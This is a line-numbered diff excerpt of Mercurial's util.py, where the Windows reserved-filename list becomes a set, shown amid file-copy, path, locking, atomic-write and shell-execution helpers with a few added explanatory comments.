981 981 try:
982 982 return func(*args, **kwargs)
983 983 finally:
984 984 if gcenabled:
985 985 gc.enable()
986 986 return wrapper
987 987
988 988 if pycompat.ispypy:
989 989 # PyPy runs slower with gc disabled
990 990 nogc = lambda x: x
991 991
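# A minimal usage sketch (illustrative, not from the original source): wrap a
# builder of huge containers so CPython's collector doesn't fire repeatedly
# mid-construction. 'buildindex' is a hypothetical example function.
#
#   @nogc
#   def buildindex(entries):
#       return {e: i for i, e in enumerate(entries)}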
992 992 def pathto(root, n1, n2):
993 993 '''return the relative path from one place to another.
994 994 root should use os.sep to separate directories
995 995 n1 should use os.sep to separate directories
996 996 n2 should use "/" to separate directories
997 997 returns an os.sep-separated path.
998 998
999 999 If n1 is a relative path, it's assumed it's
1000 1000 relative to root.
1001 1001 n2 should always be relative to root.
1002 1002 '''
1003 1003 if not n1:
1004 1004 return localpath(n2)
1005 1005 if os.path.isabs(n1):
1006 1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 1007 return os.path.join(root, localpath(n2))
1008 1008 n2 = '/'.join((pconvert(root), n2))
1009 1009 a, b = splitpath(n1), n2.split('/')
1010 1010 a.reverse()
1011 1011 b.reverse()
1012 1012 while a and b and a[-1] == b[-1]:
1013 1013 a.pop()
1014 1014 b.pop()
1015 1015 b.reverse()
1016 1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017 1017
1018 1018 def mainfrozen():
1019 1019 """return True if we are a frozen executable.
1020 1020
1021 1021 The code supports py2exe (most common, Windows only) and tools/freeze
1022 1022 (portable, not much used).
1023 1023 """
1024 1024 return (safehasattr(sys, "frozen") or # new py2exe
1025 1025 safehasattr(sys, "importers") or # old py2exe
1026 1026 imp.is_frozen(u"__main__")) # tools/freeze
1027 1027
1028 1028 # the location of data files matching the source code
1029 1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1030 1030 # executable version (py2exe) doesn't support __file__
1031 1031 datapath = os.path.dirname(pycompat.sysexecutable)
1032 1032 else:
1033 1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034 1034
1035 1035 i18n.setdatapath(datapath)
1036 1036
1037 1037 _hgexecutable = None
1038 1038
1039 1039 def hgexecutable():
1040 1040 """return location of the 'hg' executable.
1041 1041
1042 1042 Defaults to $HG or 'hg' in the search path.
1043 1043 """
1044 1044 if _hgexecutable is None:
1045 1045 hg = encoding.environ.get('HG')
1046 1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 1047 if hg:
1048 1048 _sethgexecutable(hg)
1049 1049 elif mainfrozen():
1050 1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 1051 # Env variable set by py2app
1052 1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 1053 else:
1054 1054 _sethgexecutable(pycompat.sysexecutable)
1055 1055 elif (os.path.basename(
1056 1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 1058 else:
1059 1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 1060 _sethgexecutable(exe)
1061 1061 return _hgexecutable
1062 1062
1063 1063 def _sethgexecutable(path):
1064 1064 """set location of the 'hg' executable"""
1065 1065 global _hgexecutable
1066 1066 _hgexecutable = path
1067 1067
1068 1068 def _isstdout(f):
1069 1069 fileno = getattr(f, 'fileno', None)
1070 1070 return fileno and fileno() == sys.__stdout__.fileno()
1071 1071
1072 1072 def shellenviron(environ=None):
1073 1073 """return environ with optional override, useful for shelling out"""
1074 1074 def py2shell(val):
1075 1075 'convert python object into string that is useful to shell'
1076 1076 if val is None or val is False:
1077 1077 return '0'
1078 1078 if val is True:
1079 1079 return '1'
1080 1080 return str(val)
1081 1081 env = dict(encoding.environ)
1082 1082 if environ:
1083 1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 1084 env['HG'] = hgexecutable()
1085 1085 return env
1086 1086
1087 1087 def system(cmd, environ=None, cwd=None, out=None):
1088 1088 '''enhanced shell command execution.
1089 1089 run with the environment possibly modified, possibly in a different dir.
1090 1090
1091 1091 if out is specified, it is assumed to be a file-like object that has a
1092 1092 write() method. stdout and stderr will be redirected to out.'''
1093 1093 try:
1094 1094 stdout.flush()
1095 1095 except Exception:
1096 1096 pass
1097 1097 cmd = quotecommand(cmd)
1098 1098 env = shellenviron(environ)
1099 1099 if out is None or _isstdout(out):
1100 1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 1101 env=env, cwd=cwd)
1102 1102 else:
1103 1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 1105 stderr=subprocess.STDOUT)
1106 1106 for line in iter(proc.stdout.readline, ''):
1107 1107 out.write(line)
1108 1108 proc.wait()
1109 1109 rc = proc.returncode
1110 1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 1111 rc = 0
1112 1112 return rc
1113 1113
1114 1114 def checksignature(func):
1115 1115 '''wrap a function with code to check for calling errors'''
1116 1116 def check(*args, **kwargs):
1117 1117 try:
1118 1118 return func(*args, **kwargs)
1119 1119 except TypeError:
1120 1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 1121 raise error.SignatureError
1122 1122 raise
1123 1123
1124 1124 return check
1125 1125
1126 1126 # a whitelist of known filesystems where hardlinks work reliably
1127 1127 _hardlinkfswhitelist = {
1128 1128 'btrfs',
1129 1129 'ext2',
1130 1130 'ext3',
1131 1131 'ext4',
1132 1132 'hfs',
1133 1133 'jfs',
1134 1134 'reiserfs',
1135 1135 'tmpfs',
1136 1136 'ufs',
1137 1137 'xfs',
1138 1138 'zfs',
1139 1139 }
1140 1140
1141 1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 1142 '''copy a file, preserving mode and optionally other stat info like
1143 1143 atime/mtime
1144 1144
1145 1145 checkambig argument is used with filestat, and is useful only if
1146 1146 destination file is guarded by any lock (e.g. repo.lock or
1147 1147 repo.wlock).
1148 1148
1149 1149 copystat and checkambig should be mutually exclusive.
1150 1150 '''
1151 1151 assert not (copystat and checkambig)
1152 1152 oldstat = None
1153 1153 if os.path.lexists(dest):
1154 1154 if checkambig:
1155 1155 oldstat = checkambig and filestat.frompath(dest)
1156 1156 unlink(dest)
1157 1157 if hardlink:
1158 1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 1159 # unless we are confident that dest is on a whitelisted filesystem.
1160 1160 try:
1161 1161 fstype = getfstype(os.path.dirname(dest))
1162 1162 except OSError:
1163 1163 fstype = None
1164 1164 if fstype not in _hardlinkfswhitelist:
1165 1165 hardlink = False
1166 1166 if hardlink:
1167 1167 try:
1168 1168 oslink(src, dest)
1169 1169 return
1170 1170 except (IOError, OSError):
1171 1171 pass # fall back to normal copy
1172 1172 if os.path.islink(src):
1173 1173 os.symlink(os.readlink(src), dest)
1174 1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 1175 # for them anyway
1176 1176 else:
1177 1177 try:
1178 1178 shutil.copyfile(src, dest)
1179 1179 if copystat:
1180 1180 # copystat also copies mode
1181 1181 shutil.copystat(src, dest)
1182 1182 else:
1183 1183 shutil.copymode(src, dest)
1184 1184 if oldstat and oldstat.stat:
1185 1185 newstat = filestat.frompath(dest)
1186 1186 if newstat.isambig(oldstat):
1187 1187 # stat of copied file is ambiguous to original one
1188 1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 1189 os.utime(dest, (advanced, advanced))
1190 1190 except shutil.Error as inst:
1191 1191 raise Abort(str(inst))
1192 1192
1193 1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 1194 """Copy a directory tree using hardlinks if possible."""
1195 1195 num = 0
1196 1196
1197 1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1198 1198
1199 1199 if os.path.isdir(src):
1200 1200 if hardlink is None:
1201 1201 hardlink = (os.stat(src).st_dev ==
1202 1202 os.stat(os.path.dirname(dst)).st_dev)
1203 1203 topic = gettopic()
1204 1204 os.mkdir(dst)
1205 1205 for name, kind in listdir(src):
1206 1206 srcname = os.path.join(src, name)
1207 1207 dstname = os.path.join(dst, name)
1208 1208 def nprog(t, pos):
1209 1209 if pos is not None:
1210 1210 return progress(t, pos + num)
1211 1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 1212 num += n
1213 1213 else:
1214 1214 if hardlink is None:
1215 1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 1216 os.stat(os.path.dirname(dst)).st_dev)
1217 1217 topic = gettopic()
1218 1218
1219 1219 if hardlink:
1220 1220 try:
1221 1221 oslink(src, dst)
1222 1222 except (IOError, OSError):
1223 1223 hardlink = False
1224 1224 shutil.copy(src, dst)
1225 1225 else:
1226 1226 shutil.copy(src, dst)
1227 1227 num += 1
1228 1228 progress(topic, num)
1229 1229 progress(topic, None)
1230 1230
1231 1231 return hardlink, num
1232 1232
1233 _winreservednames = b'''con prn aux nul
1234 com1 com2 com3 com4 com5 com6 com7 com8 com9
1235 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1233 _winreservednames = {
1234 'con', 'prn', 'aux', 'nul',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 }
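# Editor's note on this changeset (an inference from the commit message, not
# original source text): using a set makes the 'base.lower() in
# _winreservednames' test in checkwinfilename() below an O(1) membership
# lookup, versus a linear scan of the list it replaces.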
1236 1238 _winreservedchars = ':*?"<>|'
1237 1239 def checkwinfilename(path):
1238 1240 r'''Check that the base-relative path is a valid filename on Windows.
1239 1241 Returns None if the path is ok, or a UI string describing the problem.
1240 1242
1241 1243 >>> checkwinfilename("just/a/normal/path")
1242 1244 >>> checkwinfilename("foo/bar/con.xml")
1243 1245 "filename contains 'con', which is reserved on Windows"
1244 1246 >>> checkwinfilename("foo/con.xml/bar")
1245 1247 "filename contains 'con', which is reserved on Windows"
1246 1248 >>> checkwinfilename("foo/bar/xml.con")
1247 1249 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1248 1250 "filename contains 'AUX', which is reserved on Windows"
1249 1251 >>> checkwinfilename("foo/bar/bla:.txt")
1250 1252 "filename contains ':', which is reserved on Windows"
1251 1253 >>> checkwinfilename("foo/bar/b\07la.txt")
1252 1254 "filename contains '\\x07', which is invalid on Windows"
1253 1255 >>> checkwinfilename("foo/bar/bla ")
1254 1256 "filename ends with ' ', which is not allowed on Windows"
1255 1257 >>> checkwinfilename("../bar")
1256 1258 >>> checkwinfilename("foo\\")
1257 1259 "filename ends with '\\', which is invalid on Windows"
1258 1260 >>> checkwinfilename("foo\\/bar")
1259 1261 "directory name ends with '\\', which is invalid on Windows"
1260 1262 '''
1261 1263 if path.endswith('\\'):
1262 1264 return _("filename ends with '\\', which is invalid on Windows")
1263 1265 if '\\/' in path:
1264 1266 return _("directory name ends with '\\', which is invalid on Windows")
1265 1267 for n in path.replace('\\', '/').split('/'):
1266 1268 if not n:
1267 1269 continue
1268 1270 for c in _filenamebytestr(n):
1269 1271 if c in _winreservedchars:
1270 1272 return _("filename contains '%s', which is reserved "
1271 1273 "on Windows") % c
1272 1274 if ord(c) <= 31:
1273 1275 return _("filename contains %r, which is invalid "
1274 1276 "on Windows") % c
1275 1277 base = n.split('.')[0]
1276 1278 if base and base.lower() in _winreservednames:
1277 1279 return _("filename contains '%s', which is reserved "
1278 1280 "on Windows") % base
1279 1281 t = n[-1]
1280 1282 if t in '. ' and n not in '..':
1281 1283 return _("filename ends with '%s', which is not allowed "
1282 1284 "on Windows") % t
1283 1285
1284 1286 if pycompat.osname == 'nt':
1285 1287 checkosfilename = checkwinfilename
1286 1288 timer = time.clock
1287 1289 else:
1288 1290 checkosfilename = platform.checkosfilename
1289 1291 timer = time.time
1290 1292
1291 1293 if safehasattr(time, "perf_counter"):
1292 1294 timer = time.perf_counter
1293 1295
1294 1296 def makelock(info, pathname):
1295 1297 try:
1296 1298 return os.symlink(info, pathname)
1297 1299 except OSError as why:
1298 1300 if why.errno == errno.EEXIST:
1299 1301 raise
1300 1302 except AttributeError: # no symlink in os
1301 1303 pass
1302 1304
1303 1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1304 1306 os.write(ld, info)
1305 1307 os.close(ld)
1306 1308
1307 1309 def readlock(pathname):
1308 1310 try:
1309 1311 return os.readlink(pathname)
1310 1312 except OSError as why:
1311 1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1312 1314 raise
1313 1315 except AttributeError: # no symlink in os
1314 1316 pass
1315 1317 fp = posixfile(pathname)
1316 1318 r = fp.read()
1317 1319 fp.close()
1318 1320 return r
1319 1321
1320 1322 def fstat(fp):
1321 1323 '''stat file object that may not have fileno method.'''
1322 1324 try:
1323 1325 return os.fstat(fp.fileno())
1324 1326 except AttributeError:
1325 1327 return os.stat(fp.name)
1326 1328
1327 1329 # File system features
1328 1330
1329 1331 def fscasesensitive(path):
1330 1332 """
1331 1333 Return true if the given path is on a case-sensitive filesystem
1332 1334
1333 1335 Requires a path (like /foo/.hg) ending with a foldable final
1334 1336 directory component.
1335 1337 """
1336 1338 s1 = os.lstat(path)
1337 1339 d, b = os.path.split(path)
1338 1340 b2 = b.upper()
1339 1341 if b == b2:
1340 1342 b2 = b.lower()
1341 1343 if b == b2:
1342 1344 return True # no evidence against case sensitivity
1343 1345 p2 = os.path.join(d, b2)
1344 1346 try:
1345 1347 s2 = os.lstat(p2)
1346 1348 if s2 == s1:
1347 1349 return False
1348 1350 return True
1349 1351 except OSError:
1350 1352 return True
1351 1353
1352 1354 try:
1353 1355 import re2
1354 1356 _re2 = None
1355 1357 except ImportError:
1356 1358 _re2 = False
1357 1359
1358 1360 class _re(object):
1359 1361 def _checkre2(self):
1360 1362 global _re2
1361 1363 try:
1362 1364 # check if match works, see issue3964
1363 1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1364 1366 except ImportError:
1365 1367 _re2 = False
1366 1368
1367 1369 def compile(self, pat, flags=0):
1368 1370 '''Compile a regular expression, using re2 if possible
1369 1371
1370 1372 For best performance, use only re2-compatible regexp features. The
1371 1373 only flags from the re module that are re2-compatible are
1372 1374 IGNORECASE and MULTILINE.'''
1373 1375 if _re2 is None:
1374 1376 self._checkre2()
1375 1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1376 1378 if flags & remod.IGNORECASE:
1377 1379 pat = '(?i)' + pat
1378 1380 if flags & remod.MULTILINE:
1379 1381 pat = '(?m)' + pat
1380 1382 try:
1381 1383 return re2.compile(pat)
1382 1384 except re2.error:
1383 1385 pass
1384 1386 return remod.compile(pat, flags)
1385 1387
1386 1388 @propertycache
1387 1389 def escape(self):
1388 1390 '''Return the version of escape corresponding to self.compile.
1389 1391
1390 1392 This is imperfect because whether re2 or re is used for a particular
1391 1393 function depends on the flags, etc, but it's the best we can do.
1392 1394 '''
1393 1395 global _re2
1394 1396 if _re2 is None:
1395 1397 self._checkre2()
1396 1398 if _re2:
1397 1399 return re2.escape
1398 1400 else:
1399 1401 return remod.escape
1400 1402
1401 1403 re = _re()
1402 1404
1403 1405 _fspathcache = {}
1404 1406 def fspath(name, root):
1405 1407 '''Get name in the case stored in the filesystem
1406 1408
1407 1409 The name should be relative to root, and be normcase-ed for efficiency.
1408 1410
1409 1411 Note that this function is unnecessary on case-sensitive
1410 1412 filesystems, and should not be called there (simply because it's expensive).
1411 1413
1412 1414 The root should be normcase-ed, too.
1413 1415 '''
1414 1416 def _makefspathcacheentry(dir):
1415 1417 return dict((normcase(n), n) for n in os.listdir(dir))
1416 1418
1417 1419 seps = pycompat.ossep
1418 1420 if pycompat.osaltsep:
1419 1421 seps = seps + pycompat.osaltsep
1420 1422 # Protect backslashes. This gets silly very quickly.
1421 1423 seps = seps.replace('\\', '\\\\')
1422 1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1423 1425 dir = os.path.normpath(root)
1424 1426 result = []
1425 1427 for part, sep in pattern.findall(name):
1426 1428 if sep:
1427 1429 result.append(sep)
1428 1430 continue
1429 1431
1430 1432 if dir not in _fspathcache:
1431 1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1432 1434 contents = _fspathcache[dir]
1433 1435
1434 1436 found = contents.get(part)
1435 1437 if not found:
1436 1438 # retry "once per directory" per "dirstate.walk" which
1437 1439 # may take place for each patch of "hg qpush", for example
1438 1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1439 1441 found = contents.get(part)
1440 1442
1441 1443 result.append(found or part)
1442 1444 dir = os.path.join(dir, part)
1443 1445
1444 1446 return ''.join(result)
1445 1447
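# A minimal usage sketch (illustrative, not from the original source): given a
# file stored on disk as 'Foo/Bar.txt', looking up the normcase-ed name
# recovers the on-disk case. 'root' is a hypothetical repository path on a
# case-insensitive filesystem, normcase-ed as the docstring requires.
#
#   fspath('foo/bar.txt', root)  # -> 'Foo/Bar.txt'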
1446 1448 def getfstype(dirpath):
1447 1449 '''Get the filesystem type name from a directory (best-effort)
1448 1450
1449 1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1450 1452 '''
1451 1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1452 1454
1453 1455 def checknlink(testfile):
1454 1456 '''check whether hardlink count reporting works properly'''
1455 1457
1456 1458 # testfile may be open, so we need a separate file for checking to
1457 1459 # work around issue2543 (or testfile may get lost on Samba shares)
1458 1460 f1 = testfile + ".hgtmp1"
1459 1461 if os.path.lexists(f1):
1460 1462 return False
1461 1463 try:
1462 1464 posixfile(f1, 'w').close()
1463 1465 except IOError:
1464 1466 try:
1465 1467 os.unlink(f1)
1466 1468 except OSError:
1467 1469 pass
1468 1470 return False
1469 1471
1470 1472 f2 = testfile + ".hgtmp2"
1471 1473 fd = None
1472 1474 try:
1473 1475 oslink(f1, f2)
1474 1476 # nlinks() may behave differently for files on Windows shares if
1475 1477 # the file is open.
1476 1478 fd = posixfile(f2)
1477 1479 return nlinks(f2) > 1
1478 1480 except OSError:
1479 1481 return False
1480 1482 finally:
1481 1483 if fd is not None:
1482 1484 fd.close()
1483 1485 for f in (f1, f2):
1484 1486 try:
1485 1487 os.unlink(f)
1486 1488 except OSError:
1487 1489 pass
1488 1490
1489 1491 def endswithsep(path):
1490 1492 '''Check path ends with os.sep or os.altsep.'''
1491 1493 return (path.endswith(pycompat.ossep)
1492 1494 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1493 1495
1494 1496 def splitpath(path):
1495 1497 '''Split path by os.sep.
1496 1498 Note that this function does not use os.altsep because this is
1497 1499 an alternative of simple "xxx.split(os.sep)".
1498 1500 It is recommended to use os.path.normpath() before using this
1499 1501 function if needed.'''
1500 1502 return path.split(pycompat.ossep)
1501 1503
1502 1504 def gui():
1503 1505 '''Are we running in a GUI?'''
1504 1506 if pycompat.sysplatform == 'darwin':
1505 1507 if 'SSH_CONNECTION' in encoding.environ:
1506 1508 # handle SSH access to a box where the user is logged in
1507 1509 return False
1508 1510 elif getattr(osutil, 'isgui', None):
1509 1511 # check if a CoreGraphics session is available
1510 1512 return osutil.isgui()
1511 1513 else:
1512 1514 # pure build; use a safe default
1513 1515 return True
1514 1516 else:
1515 1517 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1516 1518
1517 1519 def mktempcopy(name, emptyok=False, createmode=None):
1518 1520 """Create a temporary file with the same contents from name
1519 1521
1520 1522 The permission bits are copied from the original file.
1521 1523
1522 1524 If the temporary file is going to be truncated immediately, you
1523 1525 can use emptyok=True as an optimization.
1524 1526
1525 1527 Returns the name of the temporary file.
1526 1528 """
1527 1529 d, fn = os.path.split(name)
1528 1530 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1529 1531 os.close(fd)
1530 1532 # Temporary files are created with mode 0600, which is usually not
1531 1533 # what we want. If the original file already exists, just copy
1532 1534 # its mode. Otherwise, manually obey umask.
1533 1535 copymode(name, temp, createmode)
1534 1536 if emptyok:
1535 1537 return temp
1536 1538 try:
1537 1539 try:
1538 1540 ifp = posixfile(name, "rb")
1539 1541 except IOError as inst:
1540 1542 if inst.errno == errno.ENOENT:
1541 1543 return temp
1542 1544 if not getattr(inst, 'filename', None):
1543 1545 inst.filename = name
1544 1546 raise
1545 1547 ofp = posixfile(temp, "wb")
1546 1548 for chunk in filechunkiter(ifp):
1547 1549 ofp.write(chunk)
1548 1550 ifp.close()
1549 1551 ofp.close()
1550 1552 except: # re-raises
1551 1553 try: os.unlink(temp)
1552 1554 except OSError: pass
1553 1555 raise
1554 1556 return temp
1555 1557
1556 1558 class filestat(object):
1557 1559 """help to exactly detect change of a file
1558 1560
1559 1561 The 'stat' attribute is the result of 'os.stat()' if the specified 'path'
1560 1562 exists. Otherwise, it is None. This avoids a preparatory
1561 1563 'exists()' check on the client side of this class.
1562 1564 """
1563 1565 def __init__(self, stat):
1564 1566 self.stat = stat
1565 1567
1566 1568 @classmethod
1567 1569 def frompath(cls, path):
1568 1570 try:
1569 1571 stat = os.stat(path)
1570 1572 except OSError as err:
1571 1573 if err.errno != errno.ENOENT:
1572 1574 raise
1573 1575 stat = None
1574 1576 return cls(stat)
1575 1577
1576 1578 @classmethod
1577 1579 def fromfp(cls, fp):
1578 1580 stat = os.fstat(fp.fileno())
1579 1581 return cls(stat)
1580 1582
1581 1583 __hash__ = object.__hash__
1582 1584
1583 1585 def __eq__(self, old):
1584 1586 try:
1585 1587 # if ambiguity between stat of new and old file is
1586 1588 # avoided, comparison of size, ctime and mtime is enough
1587 1589 # to exactly detect change of a file regardless of platform
1588 1590 return (self.stat.st_size == old.stat.st_size and
1589 1591 self.stat.st_ctime == old.stat.st_ctime and
1590 1592 self.stat.st_mtime == old.stat.st_mtime)
1591 1593 except AttributeError:
1592 1594 pass
1593 1595 try:
1594 1596 return self.stat is None and old.stat is None
1595 1597 except AttributeError:
1596 1598 return False
1597 1599
1598 1600 def isambig(self, old):
1599 1601 """Examine whether new (= self) stat is ambiguous against old one
1600 1602
1601 1603 "S[N]" below means stat of a file at N-th change:
1602 1604
1603 1605 - S[n-1].ctime < S[n].ctime: can detect change of a file
1604 1606 - S[n-1].ctime == S[n].ctime
1605 1607 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1606 1608 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1607 1609 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1608 1610 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1609 1611
1610 1612 Case (*2) above means that a file was changed twice or more within
1611 1613 the same second (= S[n-1].ctime), and comparison of timestamps
1612 1614 is then ambiguous.
1613 1615
1614 1616 The basic idea to avoid such ambiguity is to "advance mtime by 1 sec
1615 1617 if the timestamp is ambiguous".
1616 1618
1617 1619 But advancing mtime only in case (*2) doesn't work as
1618 1620 expected, because naturally advanced S[n].mtime in case (*1)
1619 1621 might be equal to manually advanced S[n-1 or earlier].mtime.
1620 1622
1621 1623 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1622 1624 treated as ambiguous regardless of mtime, to avoid overlooking
1623 1625 changes hidden by collisions between such mtimes.
1624 1626
1625 1627 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1626 1628 S[n].mtime", even if size of a file isn't changed.
1627 1629 """
1628 1630 try:
1629 1631 return (self.stat.st_ctime == old.stat.st_ctime)
1630 1632 except AttributeError:
1631 1633 return False
1632 1634
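# A worked example (illustrative, not from the original source) of the
# ambiguous case (*2) from the docstring above, with hypothetical stat values:
#
#   old.stat.st_ctime == 1500000000 and self.stat.st_ctime == 1500000000
#   # -> isambig() is True: both changes landed in the same second, so
#   # avoidambig() below bumps mtime to 1500000001 to keep them distinct.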
1633 1635 def avoidambig(self, path, old):
1634 1636 """Change file stat of specified path to avoid ambiguity
1635 1637
1636 1638 'old' should be previous filestat of 'path'.
1637 1639
1638 1640 This skips avoiding ambiguity, if a process doesn't have
1639 1641 appropriate privileges for 'path'. This returns False in this
1640 1642 case.
1641 1643
1642 1644 Otherwise, this returns True, as "ambiguity is avoided".
1643 1645 """
1644 1646 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1645 1647 try:
1646 1648 os.utime(path, (advanced, advanced))
1647 1649 except OSError as inst:
1648 1650 if inst.errno == errno.EPERM:
1649 1651 # utime() on the file created by another user causes EPERM,
1650 1652 # if a process doesn't have appropriate privileges
1651 1653 return False
1652 1654 raise
1653 1655 return True
1654 1656
1655 1657 def __ne__(self, other):
1656 1658 return not self == other
1657 1659
1658 1660 class atomictempfile(object):
1659 1661 '''writable file object that atomically updates a file
1660 1662
1661 1663 All writes will go to a temporary copy of the original file. Call
1662 1664 close() when you are done writing, and atomictempfile will rename
1663 1665 the temporary copy to the original name, making the changes
1664 1666 visible. If the object is destroyed without being closed, all your
1665 1667 writes are discarded.
1666 1668
1667 1669 checkambig argument of constructor is used with filestat, and is
1668 1670 useful only if target file is guarded by any lock (e.g. repo.lock
1669 1671 or repo.wlock).
1670 1672 '''
1671 1673 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1672 1674 self.__name = name # permanent name
1673 1675 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1674 1676 createmode=createmode)
1675 1677 self._fp = posixfile(self._tempname, mode)
1676 1678 self._checkambig = checkambig
1677 1679
1678 1680 # delegated methods
1679 1681 self.read = self._fp.read
1680 1682 self.write = self._fp.write
1681 1683 self.seek = self._fp.seek
1682 1684 self.tell = self._fp.tell
1683 1685 self.fileno = self._fp.fileno
1684 1686
1685 1687 def close(self):
1686 1688 if not self._fp.closed:
1687 1689 self._fp.close()
1688 1690 filename = localpath(self.__name)
1689 1691 oldstat = self._checkambig and filestat.frompath(filename)
1690 1692 if oldstat and oldstat.stat:
1691 1693 rename(self._tempname, filename)
1692 1694 newstat = filestat.frompath(filename)
1693 1695 if newstat.isambig(oldstat):
1694 1696 # stat of changed file is ambiguous to original one
1695 1697 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1696 1698 os.utime(filename, (advanced, advanced))
1697 1699 else:
1698 1700 rename(self._tempname, filename)
1699 1701
1700 1702 def discard(self):
1701 1703 if not self._fp.closed:
1702 1704 try:
1703 1705 os.unlink(self._tempname)
1704 1706 except OSError:
1705 1707 pass
1706 1708 self._fp.close()
1707 1709
1708 1710 def __del__(self):
1709 1711 if safehasattr(self, '_fp'): # constructor actually did something
1710 1712 self.discard()
1711 1713
1712 1714 def __enter__(self):
1713 1715 return self
1714 1716
1715 1717 def __exit__(self, exctype, excvalue, traceback):
1716 1718 if exctype is not None:
1717 1719 self.discard()
1718 1720 else:
1719 1721 self.close()
1720 1722
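# A minimal usage sketch for atomictempfile (hypothetical 'somefile'
# path). On a normal exit of the context manager the temporary copy
# atomically replaces the target; on an exception it is discarded and
# the target is left untouched:
#
#   with atomictempfile('somefile', checkambig=True) as fp:
#       fp.write('new contents')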
1721 1723 def unlinkpath(f, ignoremissing=False):
1722 1724 """unlink and remove the directory if it is empty"""
1723 1725 if ignoremissing:
1724 1726 tryunlink(f)
1725 1727 else:
1726 1728 unlink(f)
1727 1729 # try removing directories that might now be empty
1728 1730 try:
1729 1731 removedirs(os.path.dirname(f))
1730 1732 except OSError:
1731 1733 pass
1732 1734
1733 1735 def tryunlink(f):
1734 1736 """Attempt to remove a file, ignoring ENOENT errors."""
1735 1737 try:
1736 1738 unlink(f)
1737 1739 except OSError as e:
1738 1740 if e.errno != errno.ENOENT:
1739 1741 raise
1740 1742
1741 1743 def makedirs(name, mode=None, notindexed=False):
1742 1744 """recursive directory creation with parent mode inheritance
1743 1745
1744 1746 Newly created directories are marked as "not to be indexed by
1745 1747 the content indexing service", if ``notindexed`` is specified
1746 1748 for "write" mode access.
1747 1749 """
1748 1750 try:
1749 1751 makedir(name, notindexed)
1750 1752 except OSError as err:
1751 1753 if err.errno == errno.EEXIST:
1752 1754 return
1753 1755 if err.errno != errno.ENOENT or not name:
1754 1756 raise
1755 1757 parent = os.path.dirname(os.path.abspath(name))
1756 1758 if parent == name:
1757 1759 raise
1758 1760 makedirs(parent, mode, notindexed)
1759 1761 try:
1760 1762 makedir(name, notindexed)
1761 1763 except OSError as err:
1762 1764 # Catch EEXIST to handle races
1763 1765 if err.errno == errno.EEXIST:
1764 1766 return
1765 1767 raise
1766 1768 if mode is not None:
1767 1769 os.chmod(name, mode)
1768 1770
1769 1771 def readfile(path):
1770 1772 with open(path, 'rb') as fp:
1771 1773 return fp.read()
1772 1774
1773 1775 def writefile(path, text):
1774 1776 with open(path, 'wb') as fp:
1775 1777 fp.write(text)
1776 1778
1777 1779 def appendfile(path, text):
1778 1780 with open(path, 'ab') as fp:
1779 1781 fp.write(text)
1780 1782
1781 1783 class chunkbuffer(object):
1782 1784 """Allow arbitrary sized chunks of data to be efficiently read from an
1783 1785 iterator over chunks of arbitrary size."""
1784 1786
1785 1787 def __init__(self, in_iter):
1786 1788 """in_iter is the iterator that's iterating over the input chunks."""
1787 1789 def splitbig(chunks):
1788 1790 for chunk in chunks:
1789 1791 if len(chunk) > 2**20:
1790 1792 pos = 0
1791 1793 while pos < len(chunk):
1792 1794 end = pos + 2 ** 18
1793 1795 yield chunk[pos:end]
1794 1796 pos = end
1795 1797 else:
1796 1798 yield chunk
1797 1799 self.iter = splitbig(in_iter)
1798 1800 self._queue = collections.deque()
1799 1801 self._chunkoffset = 0
1800 1802
